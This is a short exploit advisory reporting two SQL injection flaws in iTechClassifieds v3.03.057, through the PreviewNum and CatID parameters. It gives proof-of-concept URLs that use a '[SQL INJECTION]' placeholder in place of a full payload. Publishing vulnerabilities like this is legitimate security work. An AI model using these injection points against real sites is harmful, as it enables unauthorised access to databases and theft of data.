# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057
 
 
[1] SQL Injection - PreviewNun
 
PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]
 
 
 
[2] SQL Injection - CatID
 
PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]
 
 
#
#
# Greetz to g0tm1lk and TheColonial.